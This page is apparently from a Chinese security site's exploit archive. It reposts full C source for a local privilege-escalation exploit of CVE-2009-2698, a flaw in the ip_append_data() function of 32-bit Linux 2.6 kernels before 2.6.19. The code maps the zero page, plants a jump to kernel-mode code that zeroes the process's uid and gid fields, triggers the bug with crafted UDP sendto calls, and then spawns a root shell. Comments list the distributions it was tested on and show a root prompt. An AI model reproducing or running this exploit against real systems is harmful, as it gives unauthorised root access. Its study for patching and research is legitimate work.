首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux Kernel 2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit
来源:p0c73n1(at)gmail(dot)com 作者:p0c73n1 发布时间:2009-09-01  

/*
**
** 0x82-CVE-2009-2698
** Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
**
** Tested White Box 4(2.6.9-5.ELsmp),
** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),
** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5),
** Fedora Core 6(2.6.18-1.2798.fc6).
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** Thankful to them.
**
** --
** bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
** sh-3.1# id
** uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t
** sh-3.1#
** --
** exploit by <p0c73n1(at)gmail(dot)com>.
**
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/personality.h>

unsigned int uid, gid;
void get_root_uid(unsigned *task)
{
 unsigned *addr=task;
 while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){
  addr++;
 }
 addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */
 addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */
 return;
}
void exploit();
void kernel_code()
{
 asm("exploit:\n"
  "push %eax\n"
  "movl $0xfffff000,%eax\n"
  "andl %esp,%eax\n"
  "pushl (%eax)\n"
  "call get_root_uid\n"
  "addl $4,%esp\n"
  "popl %eax\n");
 return;
}
void *kernel=kernel_code;

int main(int argc, char **argv)
{
 int fd=0;
 char buf[1024];
 struct sockaddr x0x;
 void *zero_page;

 uid=getuid();
 gid=getgid();
 if(uid==0){
  fprintf(stderr,"[-] check ur uid\n");
  return -1;
 }
 if(personality(0xffffffff)==PER_SVR4){
  if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
   perror("[-] mprotect()");
   return -1;
  }
 }
 else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
   perror("[-] mmap()");
   return -1;
 }
 *(unsigned long *)0x0=0x90909090;
 *(char *)0x00000004=0x90; /* +1 */
 *(char *)0x00000005=0xff;
 *(char *)0x00000006=0x25;
 *(unsigned long *)0x00000007=(unsigned long)&kernel;
 *(char *)0x0000000b=0xc3;

 if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){
  perror("[-] socket()");
  return -1;
 }
 x0x.sa_family=AF_UNSPEC;
 memset(x0x.sa_data,0x82,14);
 memset((char *)buf,0,sizeof(buf));
 sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x));
 sendto(fd,buf,1024,0,&x0x,sizeof(x0x));
 if(getuid()==uid){
  printf("[-] exploit failed, try again\n");
  return -1;
 }
 close(fd);
 execl("/bin/sh","sh","-i",NULL);
 return 0;
}

/* eoc */
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft IIS 5.0/6.0 FTP Serv
·Linux Kernel < 2.6.31-rc7 AF_I
·Linux Kernel 2.4/2.6 sock_send
·Swift Ultralite 1.032 (.M3U) L
·SolarWinds TFTP Server <=9.2.0
·Ultimate Player 1.56b (.m3u/up
·URL Hunter version 3.0.12 loca
·MailEnable 1.52 HTTP Mail Serv
·MediaCoder version 0.7.x .m3u/
·Hex Workshop 4.23//5.1//6.0 (.
·HTML Creator & Sender <= 2.3 b
·Media Jukebox 8 (.pls) Univers
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved